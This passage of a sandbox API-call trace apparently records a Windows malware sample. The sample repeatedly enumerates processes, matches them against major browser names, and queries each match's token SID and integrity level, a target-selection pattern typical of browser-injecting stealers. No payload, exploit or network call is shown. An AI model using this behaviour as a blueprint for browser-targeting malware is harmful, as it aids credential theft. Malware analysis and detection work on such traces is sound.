lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0472.293] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0472.293] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0472.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0472.293] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0472.294] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0474.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa658) returned 0xc0000004 [0474.294] VirtualAlloc (lpAddress=0x0, dwSize=0xb658, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0474.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb658, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0474.295] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0474.295] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0474.295] GetLastError () returned 0x7a [0474.295] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0474.295] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0474.295] CloseHandle (hObject=0x3bc) returned 1 [0474.295] CloseHandle (hObject=0x5a4) returned 1 [0474.295] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0474.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0474.296] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3780e8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">f") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0474.296] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0474.296] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0474.296] GetLastError () returned 0x7a [0474.296] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0474.296] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0474.296] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0474.296] CloseHandle (hObject=0x3bc) returned 1 [0474.296] CloseHandle (hObject=0x5a4) returned 1 [0474.296] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0474.296] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0474.296] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0474.296] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0474.296] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0474.296] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0474.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0474.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0474.296] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0474.296] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0474.296] GetLastError () returned 0x7a [0474.296] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0474.296] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0474.296] CloseHandle (hObject=0x3bc) returned 1 [0474.296] CloseHandle (hObject=0x5a4) returned 1 [0474.296] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0474.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0474.296] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375c60, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">g") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0474.296] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0474.296] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0474.296] GetLastError () returned 0x7a [0474.296] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0474.297] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0474.297] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0474.297] CloseHandle (hObject=0x3bc) returned 1 [0474.297] CloseHandle (hObject=0x5a4) returned 1 [0474.297] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0474.297] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0474.297] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0474.297] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0474.297] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0474.297] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0474.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0474.297] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0474.297] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0474.297] GetLastError () returned 0x7a [0474.297] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0474.297] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0474.297] CloseHandle (hObject=0x3bc) returned 1 [0474.297] CloseHandle (hObject=0x5a4) returned 1 [0474.297] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0474.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0474.297] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376420, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">h") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0474.297] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0474.297] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0474.297] GetLastError () returned 0x7a [0474.297] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0474.297] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0474.297] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0474.297] CloseHandle (hObject=0x3bc) returned 1 [0474.297] CloseHandle (hObject=0x5a4) returned 1 [0474.298] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0474.298] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0474.298] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0474.298] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0474.298] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0474.298] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0474.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0474.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0474.298] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0474.298] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0474.298] GetLastError () returned 0x7a [0474.298] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0474.298] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0474.298] CloseHandle (hObject=0x3bc) returned 1 [0474.298] CloseHandle (hObject=0x5a4) returned 1 [0474.298] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0474.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0474.298] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376a68, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">i") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0474.298] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0474.298] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0474.298] GetLastError () returned 0x7a [0474.298] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0474.298] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0474.298] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0474.298] CloseHandle (hObject=0x3bc) returned 1 [0474.298] CloseHandle (hObject=0x5a4) returned 1 [0474.298] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0474.298] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0474.298] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0474.298] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0474.298] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0474.299] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0474.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0474.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0474.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0474.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0474.299] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0474.299] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0474.299] GetLastError () returned 0x7a [0474.299] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0474.299] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0474.299] CloseHandle (hObject=0x3bc) returned 1 [0474.299] CloseHandle (hObject=0x5a4) returned 1 [0474.299] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0474.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0474.299] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376e10, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">j") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0474.299] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0474.299] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0474.299] GetLastError () returned 0x7a [0474.299] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0474.299] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0474.299] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0474.299] CloseHandle (hObject=0x3bc) returned 1 [0474.299] CloseHandle (hObject=0x5a4) returned 1 [0474.299] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0474.299] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0474.299] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0474.299] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0474.299] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0474.299] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0474.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0474.299] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0474.300] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0476.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa6a8) returned 0xc0000004 [0476.326] VirtualAlloc (lpAddress=0x0, dwSize=0xb6a8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0476.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb6a8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0476.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0476.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0476.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0476.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0476.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0476.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0476.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0476.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0476.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0476.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0476.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0476.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0476.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0476.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0476.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0476.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0476.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0476.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0476.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0476.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0476.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0476.338] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0476.338] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0476.338] GetLastError () returned 0x7a [0476.338] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0476.338] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0476.338] CloseHandle (hObject=0x3bc) returned 1 [0476.338] CloseHandle (hObject=0x5a4) returned 1 [0476.338] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0476.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0476.339] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x377fe8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">k") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0476.339] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0476.339] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0476.339] GetLastError () returned 0x7a [0476.339] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0476.339] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, 